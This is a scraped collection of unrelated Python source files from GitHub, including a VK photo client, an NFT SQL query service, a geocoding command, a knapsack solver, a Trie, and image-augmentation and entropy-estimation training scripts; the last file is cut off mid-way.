dh, dw):\n return tf.nn.max_pool(input_tensor,\n ksize=[1, kh, kw, 1],\n strides=[1, dh, dw, 1],\n padding='SAME',\n name=name)\n \ndef mean_pool(input_tensor, name, kh, kw, dh, dw):\n return tf.nn.avg_pool(input_tensor,\n ksize=[1, kh, kw, 1],\n strides=[1, dh, dw, 1],\n padding='SAME',\n name=name)\n\ndef loss(est, gt):\n return 0*tf.reduce_mean(tf.pow((tf.reduce_max(est,axis = [1,2,3])-tf.reduce_max(gt,axis = [1,2,3])),2))+\\\n 1*tf.reduce_mean(tf.reduce_sum(tf.pow((est-gt),2),axis = [1,2,3]))+\\\n 0.1*tf.reduce_mean(tf.pow(((tf.reduce_sum(est,axis = [1,2,3])-\\\n tf.reduce_sum(gt,axis = [1,2,3]))/(tf.reduce_sum(gt,axis = [1,2,3])+1)),2))\n #return tf.losses.mean_squared_error(est, gt) #所以这一步是绝对没法做loss的 est为 (1,192,256,1) gt为(1,33,2,1)\n \n# Module to test the loss layer\nif __name__ == \"__main__\":\n x = tf.placeholder(tf.float32, [1, 20, 20, 1])\n y = tf.placeholder(tf.float32, [1, 20, 20, 1])\n mse = loss(x, y)\n sess = tf.Session()\n dict = {\n x: 5*np.ones(shape=(1,20,20,1)),\n y: 4*np.ones(shape=(1,20,20,1))\n }\n print (sess.run(mse, feed_dict=dict) )\n","repo_name":"Halle-Astra/SaCNN_tensorflow","sub_path":"Codes/python与caffe互转/two-scale_model/src/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11820160181","text":"import requests\n\n\nclass VkUser:\n\n url = 'https://api.vk.com/method/'\n\n def __init__(self, token, version):\n self.params = {\n 'access_token': token,\n 'v': version\n }\n\n def get_photos(self, user_id=None, count=5, album='profile'):\n photos_url = self.url + 'photos.get'\n photos_params = {\n 'owner_id': user_id,\n 'album_id': album,\n 'rev': 0,\n 'extended': 1,\n 'photo_sizes': 1,\n 'count': count if count < 1001 else 1000\n }\n res = requests.get(photos_url,\n params={**self.params, **photos_params}).json()\n\n if res.get('error') is not None:\n print(f'Код ошибки: {res[\"error\"][\"error_code\"]}')\n return None\n\n return res['response']['items']\n","repo_name":"JulieSoboleva/Photos_backuper","sub_path":"vk_user.py","file_name":"vk_user.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26232846619","text":"#!/usr/bin/env python3\n#coding=utf-8\n#########################################################################\n# Author: @maris\n# Created Time: May 18 2017 18:55:41 PM CST\n# File Name:spider.py\n# Description:minerva服务\n#########################################################################\nimport sys\nimport re\nimport json\nimport time\nimport io\nimport requests\n\nHOST = \"http://47.243.157.215:8047/query.json\"\n\n\"\"\"\n功能:获得nft查询结果\n输入:db_link, 数据表的链接,形式如/ipfs/QmUtyPDpYMv2tHg7yZSgdUahgEaFjeSwEWx8XjQ7gVaSRW#json\n输入:nft_id, nft id,数据表默认需要包含字段中nft_id\n返回:result, 查询结果列表\n\"\"\"\ndef get_nft_by_id(db_link, nft_id):\n #step 1,构造query\n #query = \"select * from \"\n query = \"select * from ipfs.`{}` where nft_id={}\".format(\n db_link, nft_id\n )\n #print(query)\n #step 2,构造请求\n url = HOST\n header = {\"Content-Type\": \"application/json\"}\n data = {\n \"queryType\":\"SQL\",\n \"query\": query\n }\n\n res = requests.post(url, data=json.dumps(data), headers=header)\n #print(res.json())\n data = res.json()\n\n result = {}\n result[\"status\"] = 0\n result[\"msg\"] = data[\"queryState\"]\n result[\"query_id\"] = data[\"queryId\"]\n result[\"results\"] = data[\"rows\"]\n\n return result\n\n\n\"\"\"\n功能:获得nft查询结果\n输入:db_link, 数据表的链接,形式如/ipfs/QmUtyPDpYMv2tHg7yZSgdUahgEaFjeSwEWx8XjQ7gVaSRW#json\n输入:field,搜索字段,目前暂时只支持一个\n输入:word, 搜索关键词,\n返回:result, 查询结果列表\n\"\"\"\ndef search_nft(db_link,field, word):\n #step 1,构造query\n #query = \"select * from \"\n query = \"select * from ipfs.`{}` where `{}` like '%{}%'\".format(\n db_link, field, word\n )\n #print(query)\n #step 2,构造请求\n url = HOST\n header = {\"Content-Type\": \"application/json\"}\n data = {\n \"queryType\":\"SQL\",\n \"query\": query\n }\n\n res = requests.post(url, data=json.dumps(data), headers=header)\n #print(res.json())\n data = res.json()\n\n result = {}\n result[\"status\"] = 0\n result[\"msg\"] = data[\"queryState\"]\n result[\"query_id\"] = data[\"queryId\"]\n result[\"results\"] = data[\"rows\"]\n\n return result\n\n\nif __name__==\"__main__\":\n nft_id = 1\n db_link = \"/ipfs/QmYUQee1mTUGjEMtk2ZBn8LdE1YVWueF3q5ec7WMgXsGfc#json\"\n #result = get_nft_by_id(db_link, nft_id)\n field = \"title\"\n word = \"bc1\"\n result = search_nft(db_link,field, word)\n print(json.dumps(result))\n\n\n","repo_name":"cata-network/api-server","sub_path":"minerva_service.py","file_name":"minerva_service.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24261762503","text":"import pyttsx3\nfrom tqdm import tqdm\nimport time\nimport requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom pyfiglet import Figlet\nf = Figlet(font='slant')\nprint (f.renderText('Temperature'))\ndef speech(a):\n engine = pyttsx3.init()\n engine.say(a)\n engine.runAndWait()\n print(a)\ndef weather(place):\n url = f\"https://www.google.com/search?q=weather in {place}\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,'html.parser')\n temperature = s.find('div',class_='BNeawe').text\n return temperature\n\nif __name__=='__main__':\n place = str(input('place: '))\n for i in tqdm(range(100)):\n time.sleep(0.01)\n a = f'current temperature in {place}: {weather(place)}'\n speech(a)\n\n","repo_name":"Ro706/Temperature","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"25508281733","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n\n def add_car(self):\n chance = random.randint(1, 6)\n if chance == 1:\n car = Turtle()\n car.pu()\n car.color(random.choice(COLORS))\n car.shape(\"square\")\n car.turtlesize(stretch_len=2)\n car.seth(180)\n start_y = random.randrange(-250, 250, 20)\n car.goto(640, start_y)\n self.cars.append(car)\n\n def move_cars(self, round):\n for car in self.cars:\n car.forward(STARTING_MOVE_DISTANCE * round)","repo_name":"sdearth/pythoncourse","sub_path":"turtle-crossing-start/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407356768","text":"\"\"\" The 0-1 Knapsack problem\n\tAn item is in the form of a tuple (weight, value).\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tCreate 2 cases of selecting and not selecting the current item. The case that gives the higher\n\tvalue is selected.\n\n\"\"\"\n\n\ndef knapsack_01(items,max_weight):\n\tdp = [[0]*(max_weight+1) for _ in range(len(items))]\n\n\tfor i in range(len(dp)):\n\t\tfor j in range(len(dp[0])):\n\t\t\tif i >= 1:\n\t\t\t\twithout_this_item = dp[i-1][j]\n\t\t\telse:\n\t\t\t\twithout_this_item = 0\n\t\t\tif j >= items[i][0]:\n\t\t\t\twith_this_item = dp[i][j - items[i][0]] + items[i][1]\n\t\t\telse:\n\t\t\t\twith_this_item = 0\n\t\t\tdp[i][j] = max(with_this_item, without_this_item)\n\n\treturn dp[-1][-1]\n\n\nmax_weight = 6\nitems = [(2,6), (2,10), (3,12)]\nprint(\"For the items with (weight, value) = {} and max weight = {}\".format(items, max_weight))\nprint(\"the max value is: {}\".format(knapsack_01(items, max_weight)))","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Dynamic Programming/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"264226775","text":"import json\nimport logging\nimport traceback\nfrom typing import Dict, Optional, Tuple\n\nimport requests\nimport typer\n\nfrom ..lib.ai import AltAI\nfrom ..model.ai_conv_types import MessageNode, Role\nfrom ..model.persistence_model import (\n ParsedEventTable,\n add_geoaddress,\n get_parsed_events,\n)\nfrom ..types.city_event import CityEvent\n\nLOG_FORMAT = \"%(asctime)s - %(levelname)s - [%(name)s:%(lineno)d] - %(message)s\"\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(levelname)s - [%(name)s:%(lineno)d] - %(message)s\",\n handlers=[logging.StreamHandler()],\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\nNOMINATIM_URL = \"http://localhost:8080/search\"\n\n\nclass HTTPException(Exception):\n def __init__(self, status_code, reason, content):\n self.status_code = status_code\n self.reason = reason\n self.content = content\n super().__init__(f\"HTTP {status_code}: {reason}\")\n\n\n# N2S: If we use a public nominatim server, add waiting between requests\ndef get_coordinates(\n params: Dict[str, str]\n) -> Tuple[Optional[float], Optional[float]]:\n # URL of your local Nominatim server\n\n # Make the API request\n response = requests.get(NOMINATIM_URL, params=params, timeout=5)\n\n # Check if the request was successful\n if response.status_code == 200:\n # Parse the JSON response\n data = json.loads(response.text)\n # Check if data was returned\n longitude, latitude = None, None\n if data:\n # Extract latitude and longitude from the first result\n # https://nominatim.org/release-docs/develop/api/Output/\n latitude = data[0][\"lat\"]\n longitude = data[0][\"lon\"]\n\n return latitude, longitude\n else:\n logger.error(\"Raised an error to nomatamin for Params %s \", str(params))\n raise HTTPException(\n response.status_code, response.reason, response.content\n )\n\n\ndef ask(address, alt_ai: AltAI) -> MessageNode:\n return alt_ai.send( # pylint: disable=no-value-for-parameter\n [\n MessageNode(\n role=Role.system,\n message_content=\"\"\"\n I am going to give you some addresses in a string format I want you to normalize them and return the normalized address in a json format.\n \n example if I give you : `1301 Hudson Street, Jersey City`. Return JSON in the following format(triple back ticks are important)):\n ```{\n \"street\": \"1301 Hudson Street\",\n \"city\": \"Jersey City\",\n \"country\": \"United States\",\n }``` \n Use the following rules to do this:\n 0. Do not add the State if its missing in the address.\n 1. The addresses I provide you may be badly formatted or too general(since the data is from the web)\n in this case return NOTHING. Example If I give you `Jersey City` or `New York` only return nothing.\n 2. Strip out what might be an apartment or suite number, state from the address. Like for example in:\n \"1301 Adams Street C3, Hoboken\"\n I want you to return the JSON:\n ```{\n \"street\": \"1301 Adams Street\",\n \"city\": \"Hoboken\",\n \"country\": \"United States\",\n }```\n stripping out the C3\n\n 4. Return your answer in a **VALID** json delimited by triple back ticks. \n\n Wait for me to paste the address.\n \"\"\",\n ),\n MessageNode(\n role=Role.user,\n message_content=(f\"Here is the address: {address}\"),\n ),\n ]\n )\n\n\ndef _try_format_address_with_ai(address: str) -> Optional[Dict[str, str]]:\n alt_ai = AltAI()\n ai_message = ask(address, alt_ai)\n address_str = (\n ai_message.message_content.replace(\"```\", \"\")\n if ai_message.message_content\n else None\n )\n if address_str:\n try:\n address_json = json.loads(address_str)\n except json.JSONDecodeError as exc:\n logger.warning(\n \"Failed to parse json from `%s` due to %s\", address_str, exc\n )\n raise exc\n return address_json\n else:\n logger.warning(\"Got no response from ai for %s\", address)\n return None\n\n\ndef do_rcode(\n ctx: typer.Context,\n filename: str,\n version: str,\n parse_failed_only: bool = False,\n) -> None:\n parsed_events = get_parsed_events(\n ctx,\n filename=filename,\n version=version,\n columns=[\n ParsedEventTable.id,\n ParsedEventTable.event_json,\n ParsedEventTable.name,\n ParsedEventTable.description,\n ],\n parse_failed_only=parse_failed_only,\n )\n typer.echo(f\"Got {len(parsed_events)} events to process\")\n for event in parsed_events:\n event_obj = CityEvent(\n **{\n **event.event_json,\n **dict(name=event.name, description=event.description),\n }\n )\n addresses = event_obj.addresses\n if not addresses:\n logger.warning(\"No addresses found for event %d\", event.id)\n continue\n for address in addresses:\n lat, long = None, None\n try:\n lat, long = get_coordinates(params={\"q\": address})\n if lat is None or long is None:\n json_address = _try_format_address_with_ai(address)\n if json_address:\n lat, long = get_coordinates(json_address)\n else:\n raise ValueError(\n f\"Failed to get coordinates from AI as well for adddress {address}!\"\n )\n except Exception as exc: # pylint: disable=broad-exception-caught\n logger.warning(\n \"Failed to get coordinates for %s due to an error %s. Logging this as in the database for event id %d\",\n address,\n exc,\n event.id,\n )\n stack_trace = traceback.format_exc()\n add_geoaddress(\n ctx,\n parsed_event_id=event.id,\n address=address,\n failure_reason=str(stack_trace),\n )\n continue\n logger.debug(\"Adding address %s for id %d\", address, event.id)\n add_geoaddress(\n ctx,\n parsed_event_id=event.id,\n address=address,\n latitude=lat,\n longitude=long,\n failure_reason=None\n if lat and long\n else \"Failed to get find coordinates for this address\",\n )\n\n\n# N2S: Make sure your local Nominatim server is running and accessible at\n# http://localhost:8080. Adjust the URL and port as needed.\n","repo_name":"itissid/Drop-PoT","sub_path":"src/drop_backend/commands/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44407323150","text":"#Implement a trie with insert, search, and startsWith methods.\r\n#\r\n#Example:\r\n#\r\n#Trie trie = new Trie();\r\n#\r\n#trie.insert(\"apple\");\r\n#trie.search(\"apple\"); // returns true\r\n#trie.search(\"app\"); // returns false\r\n#trie.startsWith(\"app\"); // returns true\r\n#trie.insert(\"app\"); \r\n#trie.search(\"app\"); // returns true\r\n#Note:\r\n#\r\n#You may assume that all inputs are consist of lowercase letters a-z.\r\n#All inputs are guaranteed to be non-empty strings.\r\n\r\n\r\nclass TrieNode(object):\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.children = {} # mapping from letter to child TrieNodes\r\n self.terminal = False # flag indicates whole word\r\n\r\nclass Trie(object):\r\n\r\n def __init__(self):\r\n self.root = TrieNode()\r\n self.root.terminal = True # empty string is a whole word\r\n\r\n def insert(self, word):\r\n \"\"\"\r\n Inserts a word into the trie.\r\n :type word: str\r\n :rtype: void\r\n \"\"\"\r\n node = self.root\r\n for c in word:\r\n if c not in node.children: # create a node if it does not exist\r\n node.children[c] = TrieNode()\r\n node = node.children[c]\r\n node.terminal = True # set to True at end of word\r\n\r\n def search(self, word):\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n :type word: str\r\n :rtype: bool\r\n \"\"\"\r\n node = self.root\r\n for c in word:\r\n if c in node.children:\r\n node = node.children[c]\r\n else:\r\n return False\r\n return node.terminal # only True if terminal\r\n\r\n def startsWith(self, prefix):\r\n \"\"\"\r\n Returns if there is any word in the trie\r\n that starts with the given prefix.\r\n :type prefix: str\r\n :rtype: bool\r\n \"\"\"\r\n node = self.root\r\n for c in prefix:\r\n if c in node.children:\r\n node = node.children[c]\r\n else:\r\n return False\r\n return True","repo_name":"nileshpaliwal/May-Leetcoding-Challenge-2020","sub_path":"Implement Trie (Prefix Tree).py","file_name":"Implement Trie (Prefix Tree).py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10596484558","text":"import h5py\nimport numpy as np\nfrom skimage.feature import canny\nfrom skimage.util import img_as_float32\n\nfrom atlalign.base import DisplacementField\n\n\ndef load_dataset_in_memory(h5_path, dataset_name):\n \"\"\"Load a dataset of a h5 file in memory.\"\"\"\n with h5py.File(h5_path, \"r\") as f:\n return f[dataset_name][:]\n\n\nclass DatasetAugmenter:\n \"\"\"Class that does the augmentation.\n\n Attributes\n ----------\n original_path : str\n Path to where the original dataset is located.\n\n \"\"\"\n\n def __init__(self, original_path):\n self.original_path = original_path\n\n self.n_orig = len(load_dataset_in_memory(self.original_path, \"image_id\"))\n\n def augment(\n self,\n output_path,\n n_iter=10,\n anchor=True,\n p_reg=0.5,\n random_state=None,\n max_corrupted_pixels=500,\n ds_f=8,\n max_trials=5,\n ):\n \"\"\"Augment the original dataset and create a new one.\n\n Note that this not modify the original dataset.\n\n Parameters\n ----------\n output_path : str\n Path to where the new h5 file stored.\n\n n_iter : int\n Number of augmented samples per each sample in the original dataset.\n\n anchor : bool\n If True, then dvf anchored before inverted.\n\n p_reg : bool\n Probability that we start from a registered image\n (rather than the moving).\n\n random_state : bool\n Random state\n\n max_corrupted_pixels : int\n Maximum numbr of corrupted pixels allowed for a dvf - the actual\n number is computed as np.sum(df.jacobian() < 0)\n\n ds_f : int\n Downsampling factor for inverses. 1 creates the least artifacts.\n\n max_trials : int\n Max number of attemps to augment before an identity displacement\n used as augmentation.\n \"\"\"\n np.random.seed(random_state)\n\n n_new = n_iter * self.n_orig\n print(n_new)\n\n with h5py.File(self.original_path, \"r\") as f_orig:\n # extract\n dset_img_orig = f_orig[\"img\"]\n dset_image_id_orig = f_orig[\"image_id\"]\n dset_dataset_id_orig = f_orig[\"dataset_id\"]\n dset_deltas_xy_orig = f_orig[\"deltas_xy\"]\n dset_inv_deltas_xy_orig = f_orig[\"inv_deltas_xy\"]\n dset_p_orig = f_orig[\"p\"]\n\n with h5py.File(output_path, \"w\") as f_aug:\n dset_img_aug = f_aug.create_dataset(\n \"img\", (n_new, 320, 456), dtype=\"uint8\"\n )\n dset_image_id_aug = f_aug.create_dataset(\n \"image_id\", (n_new,), dtype=\"int\"\n )\n dset_dataset_id_aug = f_aug.create_dataset(\n \"dataset_id\", (n_new,), dtype=\"int\"\n )\n dset_p_aug = f_aug.create_dataset(\"p\", (n_new,), dtype=\"int\")\n dset_deltas_xy_aug = f_aug.create_dataset(\n \"deltas_xy\", (n_new, 320, 456, 2), dtype=np.float16\n )\n dset_inv_deltas_xy_aug = f_aug.create_dataset(\n \"inv_deltas_xy\", (n_new, 320, 456, 2), dtype=np.float16\n )\n\n for i in range(n_new):\n print(i)\n i_orig = i % self.n_orig\n\n mov2reg = DisplacementField(\n dset_deltas_xy_orig[i_orig, ..., 0],\n dset_deltas_xy_orig[i_orig, ..., 1],\n )\n\n # copy\n dset_image_id_aug[i] = dset_image_id_orig[i_orig]\n dset_dataset_id_aug[i] = dset_dataset_id_orig[i_orig]\n dset_p_aug[i] = dset_p_orig[i_orig]\n\n use_reg = np.random.random() > p_reg\n print(\"Using registered: {}\".format(use_reg))\n\n if not use_reg:\n # mov != reg\n img_mov = dset_img_orig[i_orig]\n else:\n # mov=reg\n img_mov = mov2reg.warp(dset_img_orig[i_orig])\n mov2reg = DisplacementField.generate(\n (320, 456), approach=\"identity\"\n )\n\n is_nice = False\n n_trials = 0\n\n while not is_nice:\n n_trials += 1\n\n if n_trials == max_trials:\n print(\"Replicating original: out of trials\")\n dset_img_aug[i] = dset_img_orig[i_orig]\n dset_deltas_xy_aug[i] = dset_deltas_xy_orig[i_orig]\n dset_inv_deltas_xy_aug[i] = dset_inv_deltas_xy_orig[i_orig]\n break\n\n else:\n mov2art = self.generate_mov2art(img_mov)\n\n reg2mov = mov2reg.pseudo_inverse(ds_f=ds_f)\n reg2art = reg2mov(mov2art)\n\n # anchor\n if anchor:\n print(\"ANCHORING\")\n reg2art = reg2art.anchor(\n ds_f=50, smooth=0, h_kept=0.9, w_kept=0.9\n )\n\n art2reg = reg2art.pseudo_inverse(ds_f=ds_f)\n\n validity_check = np.all(\n np.isfinite(reg2art.delta_x)\n ) and np.all(np.isfinite(reg2art.delta_y))\n validity_check &= np.all(\n np.isfinite(art2reg.delta_x)\n ) and np.all(np.isfinite(art2reg.delta_y))\n jacobian_check = (\n np.sum(reg2art.jacobian < 0) < max_corrupted_pixels\n )\n jacobian_check &= (\n np.sum(art2reg.jacobian < 0) < max_corrupted_pixels\n )\n\n if validity_check and jacobian_check:\n is_nice = True\n print(\"Check passed\")\n else:\n print(\"Check failed\")\n\n if n_trials != max_trials:\n dset_img_aug[i] = mov2art.warp(img_mov)\n dset_deltas_xy_aug[i] = np.stack(\n [art2reg.delta_x, art2reg.delta_y], axis=-1\n )\n dset_inv_deltas_xy_aug[i] = np.stack(\n [reg2art.delta_x, reg2art.delta_y], axis=-1\n )\n\n @staticmethod\n def generate_mov2art(img_mov, verbose=True, radius_max=60, use_normal=True):\n \"\"\"Generate geometric augmentation and its inverse.\"\"\"\n shape = img_mov.shape\n img_mov_float = img_as_float32(img_mov)\n edge_mask = canny(img_mov_float)\n\n if use_normal:\n c = np.random.normal(0.7, 0.3)\n else:\n c = np.random.random()\n\n if verbose:\n print(\"Scalar: {}\".format(c))\n\n mov2art = c * DisplacementField.generate(\n shape,\n approach=\"edge_stretching\",\n edge_mask=edge_mask,\n interpolation_method=\"rbf\",\n interpolator_kwargs={\"function\": \"linear\"},\n n_perturbation_points=6,\n radius_max=radius_max,\n )\n\n return mov2art\n","repo_name":"BlueBrain/atlas-alignment","sub_path":"atlalign/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":7514,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72489830914","text":"from bisect import bisect_left\nimport sys\ninput = sys.stdin.readline\n\n# 파싱\nl = int(input())\nnums = list(map(int, input().split()))\nnums.sort()\nn = int(input())\n\nif n > nums[0]:\n idx = bisect_left(nums, n)\n print(max(0, (nums[idx] - n) * (n - nums[idx - 1]) - 1))\nelse:\n print(max(0, (nums[0] - n) * n - 1))\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/1059_좋은 구간.py","file_name":"1059_좋은 구간.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3205211976","text":"import argparse\nimport json\nimport os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\n\nimport model.net_ubs as net\nfrom data.dataset import underdamped_beadspring_dataset\nfrom misc.logger import load_checkpoint, logging_metrics, save_checkpoint\nfrom misc.sampler import CartesianSeqSampler\n\n\ndef train(opt, neep1, neep2, optim, pos_trajs, vel_trajs, sampler):\n neep1.train()\n neep2.train()\n batch = next(sampler)\n xs = pos_trajs[batch].to(opt.device)\n vs = vel_trajs[batch].to(opt.device)\n\n ent1 = neep1(xs[-1], vs[-1])\n ent2 = neep2(xs, vs)\n\n optim.zero_grad()\n J1 = (ent1 - torch.exp(-ent1)).mean()\n J2 = (ent2 - torch.exp(-ent2)).mean()\n loss = -J1 - J2\n loss.backward()\n optim.step()\n\n return J1.item(), J2.item()\n\n\ndef validate(opt, neep1, neep2, pos_trajs, vel_trajs, sampler):\n neep1.eval()\n neep2.eval()\n\n ret1 = []\n ret2 = []\n\n J1 = 0\n J2 = 0\n with torch.no_grad():\n for batch in sampler:\n xs = pos_trajs[batch].to(opt.device)\n vs = vel_trajs[batch].to(opt.device)\n ent1 = neep1(xs[-1], vs[-1])\n ent2 = neep2(xs, vs)\n\n ret1.append(ent1.cpu().squeeze().numpy())\n ret2.append(ent2.cpu().squeeze().numpy())\n J1 += (ent1 - torch.exp(-ent1)).sum().cpu().item()\n J2 += (ent2 - torch.exp(-ent2)).sum().cpu().item()\n\n J1 = J1 / sampler.size\n J2 = J2 / sampler.size\n\n ret1 = np.concatenate(ret1)\n ret1 = ret1.reshape(pos_trajs.shape[0], -1)\n\n ret2 = np.concatenate(ret2)\n ret2 = ret2.reshape(pos_trajs.shape[0], -1)\n\n return ret1, ret2, J1, J2\n\n\ndef main(opt):\n ##############################\n # Prepare dataset and models #\n ##############################\n trainset = underdamped_beadspring_dataset(opt, seed=0)\n validset = underdamped_beadspring_dataset(opt, seed=1)\n\n pos_trajs_t, vel_trajs_t = trainset[\"position\"], trainset[\"velocity\"]\n val_pos_trajs_t, val_vel_trajs_t = validset[\"position\"], validset[\"velocity\"]\n\n torch.manual_seed(opt.seed)\n random.seed(opt.seed)\n\n neep1, neep2 = net.__dict__[opt.arch](opt)\n optim = torch.optim.Adam(\n list(neep1.parameters()) + list(neep2.parameters()),\n opt.lr,\n )\n train_sampler = CartesianSeqSampler(\n opt.trj_num, opt.trj_len, opt.seq_len, opt.batch_size, device=opt.device\n )\n val_sampler = CartesianSeqSampler(\n opt.trj_num,\n opt.trj_len,\n opt.seq_len,\n opt.test_batch_size,\n device=opt.device,\n train=False,\n )\n\n ############\n # Training #\n ############\n if not os.path.exists(opt.save):\n os.makedirs(opt.save)\n\n ret_train = []\n ret_val = []\n\n for i in tqdm(range(1, opt.n_iter + 1)):\n if i % opt.record_freq == 0 or i == 1:\n preds1, preds2, train_J1, train_J2 = validate(\n opt, neep1, neep2, pos_trajs_t, vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n train_log = logging_metrics(\n opt.seq_len, opt.time_step, train_J1, train_J2, preds\n )\n train_log[\"iteration\"] = i\n print(\n \"Train iter: %d J1: %1.4e J2: %1.4e pred: %.5f\"\n % (i, train_log[\"J1\"], train_log[\"J2\"], train_log[\"pred_rate\"])\n )\n\n preds1, preds2, val_J1, val_J2 = validate(\n opt, neep1, neep2, val_pos_trajs_t, val_vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n val_log = logging_metrics(opt.seq_len, opt.time_step, val_J1, val_J2, preds)\n val_log[\"iteration\"] = i\n print(\n \"Valid iter: %d J1: %1.4e J2: %1.4e pred: %.5f\"\n % (i, val_log[\"J1\"], val_log[\"J2\"], val_log[\"pred_rate\"])\n )\n\n if i == 1:\n best_val_J1 = val_J1\n best_val_J2 = val_J2\n best_state_dict1 = neep1.state_dict()\n best_state_dict2 = neep2.state_dict()\n else:\n if best_val_J1 < val_J1:\n best_val_J1 = val_J1\n best_state_dict1 = neep1.state_dict()\n save_checkpoint(\n {\n \"iteration\": i,\n \"state_dict\": best_state_dict1,\n \"best_J\": best_val_J1,\n },\n opt.save,\n \"neep1\",\n )\n if best_val_J2 < val_J2:\n best_val_J2 = val_J2\n best_state_dict2 = neep2.state_dict()\n save_checkpoint(\n {\n \"iteration\": i,\n \"state_dict\": best_state_dict2,\n \"best_J\": best_val_J2,\n },\n opt.save,\n \"neep2\",\n )\n val_log[\"best_J1\"] = best_val_J1\n val_log[\"best_J2\"] = best_val_J2\n ret_train.append(train_log)\n ret_val.append(val_log)\n\n train(opt, neep1, neep2, optim, pos_trajs_t, vel_trajs_t, train_sampler)\n\n del trainset, validset\n\n ############################\n # Testing with best models #\n ############################\n load_checkpoint(\"neep1\", opt.save, neep1)\n load_checkpoint(\"neep2\", opt.save, neep2)\n\n testset = underdamped_beadspring_dataset(opt, seed=2)\n test_pos_trajs_t, test_vel_trajs_t, ents = (\n testset[\"position\"],\n testset[\"velocity\"],\n testset[\"EP\"],\n )\n\n preds1, preds2, J1, J2 = validate(\n opt, neep1, neep2, test_pos_trajs_t, test_vel_trajs_t, val_sampler\n )\n preds = preds2 - preds1\n test_logs = logging_metrics(opt.seq_len, opt.time_step, J1, J2, preds, ents)\n print(\n \"Test J1: %1.4e J2: %1.4e pred: %.5f R-square: %.5f\"\n % (\n test_logs[\"J1\"],\n test_logs[\"J2\"],\n test_logs[\"pred_rate\"],\n test_logs[\"r_square\"],\n )\n )\n\n ##################################################\n # Save train, valid, test logs & hyperparameters #\n ##################################################\n # train_df = pd.DataFrame(ret_train)\n val_df = pd.DataFrame(ret_val)\n test_df = pd.DataFrame([test_logs])\n\n # train_df.to_csv(os.path.join(opt.save, \"train_log.csv\"), index=False)\n val_df.to_csv(os.path.join(opt.save, \"val_log.csv\"), index=False)\n test_df.to_csv(os.path.join(opt.save, \"test_log.csv\"), index=False)\n opt.device = \"cuda\" if use_cuda else \"cpu\"\n hparams = json.dumps(vars(opt))\n with open(os.path.join(opt.save, \"hparams.json\"), \"w\") as f:\n f.write(hparams)\n\n\nif __name__ == \"__main__\":\n arch_names = sorted(\n name\n for name in net.__dict__\n if name.islower() and not name.startswith(\"__\") and callable(net.__dict__[name])\n )\n parser = argparse.ArgumentParser(\n description=\"Neural Entropy Production Estimator for multi bead-spring model\"\n )\n parser.add_argument(\n \"-a\",\n \"--arch\",\n metavar=\"ARCH\",\n default=\"mlp\",\n choices=arch_names,\n help=\"model architecture: \" + \" | \".join(arch_names) + \" (default: mlp)\",\n )\n parser.add_argument(\n \"--N\",\n type=int,\n default=2,\n metavar=\"N\",\n help=\"number of input neuron = number of beads (default: 2)\",\n )\n parser.add_argument(\n \"--trj_num\",\n \"-M\",\n type=int,\n default=10000,\n metavar=\"M\",\n help=\"number of trajectories (default: 10000)\",\n )\n parser.add_argument(\n \"--trj_len\",\n \"-L\",\n type=int,\n default=1000,\n metavar=\"L\",\n help=\"number of step for each trajectory (default: 1000)\",\n )\n parser.add_argument(\n \"--time_step\",\n type=float,\n default=1e-2,\n help=\"time step size of simulation (default: 0.01)\",\n )\n parser.add_argument(\n \"--m\",\n type=float,\n default=1e-2,\n help=\"mass (default: 0.01)\",\n )\n parser.add_argument(\n \"--Tc\",\n type=float,\n default=1,\n metavar=\"T\",\n help=\"Cold heat bath temperature (default: 1)\",\n )\n parser.add_argument(\n \"--Th\",\n type=float,\n default=10,\n metavar=\"T\",\n help=\"Hot heat bath temperature (default: 10)\",\n )\n parser.add_argument(\n \"--save\",\n default=\"./checkpoint\",\n type=str,\n metavar=\"PATH\",\n help=\"path to save result (default: none)\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=4096,\n metavar=\"N\",\n help=\"input batch size for training (default: 4096)\",\n )\n parser.add_argument(\n \"--test_batch_size\",\n 